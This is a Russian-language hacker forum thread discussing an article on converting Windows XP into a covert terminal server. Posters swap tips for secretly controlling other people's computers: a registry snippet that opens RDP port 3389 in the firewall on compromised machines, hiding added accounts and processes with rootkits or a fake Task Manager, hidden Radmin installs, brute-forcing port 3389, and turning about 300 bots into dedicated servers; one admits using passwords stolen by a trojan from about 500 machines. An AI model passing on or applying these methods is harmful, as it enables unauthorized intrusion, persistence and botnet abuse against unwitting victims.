Авторские статьи Превращение Win-xp-sp2 в сервер терминалов (или троян от Мелкомягких)

Discussion in 'Статьи' started by -=lebed=-, 21 Mar 2007.

Thread Status:
Not open for further replies.
  1. gri.n

    gri.n New Member

    Joined:
    12 Nov 2008
    Messages:
    124
    Likes Received:
    4
    Reputations:
    0
    да 30 % маловато ! Но статья заслуживает уважения !
     
  2. s_p_a_m

    s_p_a_m Elder - Старейшина

    Joined:
    8 Feb 2008
    Messages:
    100
    Likes Received:
    58
    Reputations:
    4
    Учетку видно при загрузке компа, как это возможно исправить? Каким образом скрывается учетная запись Администратор, которую видно только при загрузке в сейф моде, как сделать эту учетку также ?
     
  3. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    2 -=lebed=- c новым годом тебя учитель ;) у меня к тебе вопрос , значит так ... довольно часто имею cmd на w2k , учётку создают без проблем , если конечно винда не на испанском :( , но нет конекта к RDP, то есть выдаёт
    как это можно сделать через cmd , пробывал прописывать это

    Code:
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
    "3389:TCP"="3389:TCP:*:Enabled:@xpsp2res.dll,-22009"
    на ХР бывает прокатывает , а вот W2K не срабатывает это :( что можно придумать , если знаешь будь добр подскажи :)
     
  4. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    На W2K не пробовал, кроме того может тебе попадаются W2K server ?
     
  5. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Q: Как скрыть учетную запись пользователя в экране приветствия
     
  6. stopxaker

    stopxaker Elder - Старейшина

    Joined:
    6 Sep 2008
    Messages:
    269
    Likes Received:
    284
    Reputations:
    18
    ага и W2K server и standard Ed :) сейчас с W2k standard Ed сижу уже голову сломал :)

    зы в ПМ скинул ip с пассом от радмина
     
  7. InvisibleSM

    InvisibleSM Banned

    Joined:
    3 Dec 2008
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    :(

    реально ли скрыть присутствие юзера в диспетчере задач, вкладка пользователи?
     
  8. -=lebed=-

    -=lebed=- хэшкрякер

    Joined:
    21 Jun 2006
    Messages:
    3,804
    Likes Received:
    1,960
    Reputations:
    594
    Да всё можно скрыть вообщем-то, ключевое слово "руткит".
    P.S. Может проще совсем запретить диспечер задач, изменив политики безопасности?
     
  9. InvisibleSM

    InvisibleSM Banned

    Joined:
    3 Dec 2008
    Messages:
    6
    Likes Received:
    1
    Reputations:
    0
    за руткит спасибо огромное, а запрещать диспетчер, всмысле чтоб хозяин компа не мог его открыть? :) это палево уже
     
  10. hack001

    hack001 New Member

    Joined:
    17 Jun 2009
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    нет палится , у меня kis 7.0 так его он сажрал .
     
  11. vov4ka

    vov4ka New Member

    Joined:
    24 Sep 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    В общем сделал все как в статье и не могу зайти на комп,чтобы не выкидывало его текущего пользователь и все. Помог файлик key.reg. У меня огромная просьба к автору: дайте, плз, ссылку на статью "настройка сервера терминалов и политики безопасности" или поясните значение настроек файла ket.reg и расскажите как можно настроить его через консоль управления! Заранее оч. благодарен!
     
  12. jasd

    jasd New Member

    Joined:
    22 Apr 2009
    Messages:
    59
    Likes Received:
    3
    Reputations:
    0
    пробовал запустить на удаленном компе термина, запустил скачаный файл из статьи, а нового пользователя нет. в чем беда?
     
  13. $ereg@

    $ereg@ Elder - Старейшина

    Joined:
    21 Aug 2008
    Messages:
    91
    Likes Received:
    4
    Reputations:
    0
    значит не запустил или в реестр ничего не добавилось) копай в ту сторону) а может сработал какойнить avast и не дал запуститься)
    советую поставить на машину скрытый радмин и глянуть что происходит на машине. токо не вздумай с радмином с полным управлением на машину залететь))))
     
  14. ichechen

    ichechen New Member

    Joined:
    16 Oct 2009
    Messages:
    33
    Likes Received:
    4
    Reputations:
    8
    Некоторые антивири вроде mcafee палят сам sfx архив если там идет скрытый запуск чего то)))
    Сделай точно такой же диспетчер за исключением того, что там твои процессы не будут высвечиваться и замени путь к диспетчеру в реестре :D
     
    #54 ichechen, 9 Jan 2010
    Last edited: 9 Jan 2010
  15. Nik(rus)

    Nik(rus) Member

    Joined:
    19 Jun 2009
    Messages:
    45
    Likes Received:
    7
    Reputations:
    0
    Штука занятная... ну у меня SP2 и не пашет, версию смарел - при копи(пасте) версии 2055 она чeдесным образом меняется на 2180! Обидно, помогли только установки TS_Free + WPA_Kill, но они с гуи, а у меня тока консоле :(, хотел через AutoIt сделать... но лениво :)
    PS: наткнулся на пасс админа от логов трояна, кладущего радмин, компов штук 500, все работает, повезло!
     
  16. Nik(rus)

    Nik(rus) Member

    Joined:
    19 Jun 2009
    Messages:
    45
    Likes Received:
    7
    Reputations:
    0
    Ура, я смог заменить dll-ку... но она не пашет чтоли? :3 У меня все равно нужно выкинуть админа для входа...

    Ан нет, это были кривые руки, удалившие кое-что из ключа реестра! Аффтару респект, статья лучшая ;)
     
    #56 Nik(rus), 7 Feb 2010
    Last edited: 7 Feb 2010
  17. ErrorNeo

    ErrorNeo Elder - Старейшина

    Joined:
    2 May 2009
    Messages:
    923
    Likes Received:
    838
    Reputations:
    402
    немного развил тему:
    http://forum.antichat.ru/showpost.php?p=1962387&postcount=12
     
  18. rebbe

    rebbe New Member

    Joined:
    8 Jan 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    а можно как нибудь прикрутить запрос еще?например ставлю скрипт который собирает ип и если все ровно установилось с прямым ипом то он отстукивается на скрипт,вот так как нибудь можно замутить?
    просто есть ботов штук 300,хотел их просто прогрузить что бы дедиков из них сделать
     
  19. noxjoker

    noxjoker Member

    Joined:
    7 Aug 2009
    Messages:
    189
    Likes Received:
    24
    Reputations:
    0
    ErrorNeo канешно гениально написать на Delphi что можно сделать просто в бате. Или вообще лучше сделать так:
    исполняющий файл
    и dll .
    Или можно чтоб качало dll. Так только один ехе будет.

    Rebbe пишешь scan + brute на 3389. После получение компа надо чтоб выполнило твой exe.
    Может тебе поможет

    [​IMG]
     
    #59 noxjoker, 22 Mar 2010
    Last edited: 22 Mar 2010
  20. Life7

    Life7 Banned

    Joined:
    14 Jun 2009
    Messages:
    150
    Likes Received:
    54
    Reputations:
    0
    спасибо. очень вроде ясная инфа.
    скоро попробую на практите.
     
Thread Status:
Not open for further replies.